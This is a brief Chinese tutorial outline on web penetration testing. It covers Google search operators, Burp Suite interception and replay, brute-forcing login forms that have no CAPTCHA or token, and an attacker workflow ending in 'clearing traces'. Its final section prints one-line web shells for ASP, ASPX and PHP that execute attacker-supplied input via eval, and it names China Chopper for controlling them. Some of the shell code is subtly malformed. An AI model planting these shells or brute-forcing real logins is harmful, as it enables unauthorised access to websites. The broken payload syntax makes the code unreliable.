渗透测试的概念和实战
- 目录
- 1. 前言
- 2. 常见web安全漏洞
- 3. 思路
- 3.1渗透测试思路
- 3.2黑客攻击思路
- 4. 暴力**
- 4.1谷歌黑语法
- 4.1.1 黑语法inurl:搜索url包含指定字符串
- 4.1.2 黑语法intitle:搜索网页中的标题名是否包含指定字符串
- 4.1.3 黑语法intext:搜索网页正文内容是否包含指定字符串
- 4.2Burpsuite常用功能
- 4.2.1 拦截
- 4.2.2抓包
- 4.2.3改包
- 4.2.4重放
- 4.3后台暴力**
- 5. 上传木马或漏洞
- 5.1一句话木马
- 5.2上传漏洞
1.前言
渗透测试时通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。
2.常见web安全漏洞
3.思路
3.1渗透测试思路
信息收集->攻击测试
3.2黑客攻击思路
信息收集->攻击测试->提升权限->扩大成果->清除痕迹
4.暴力**
4.1谷歌黑语法
4.1.1黑语法inurl:搜索url包含指定字符串
4.1.2黑语法intitle:搜索网页中的标题名是否包含指定字符串
4.1.3黑语法intext:搜索网页正文内容是否包含指定字符串
4.2Burpsuite常用功能
Burpsuite是Java开发的工具,所以需要安装好JDK,版本最好1.8以上
使用流程:
拦截->抓包->改包->重放
4.2.1 拦截
点击options配置代理服务器
浏览器也要配置,这里使用火狐浏览器,安装插件proxy或者谷歌hackbar
4.2.2抓包
配置好,刷新浏览器就能截取到数据包
但此时并没有达到拦截效果,需要开启Intercept,改为ON
4.2.3改包
刷新浏览器就能截取到数据包,并拦截
4.2.4重放
重放数据包
4.3后台暴力**
对登陆数据包不存在的验证码、token等一次性验证进行**。
5.上传木马或漏洞
5.1一句话木马
- asp:<%eval request(“pass”)%>
- aspx:<%@Page Language%><?eval(Request.Item[“pass”].” unsafe”);%>
- php:<?php @eval($_POST[‘pass’];);?>
5.2上传漏洞
软件:中国菜刀,配合木马使用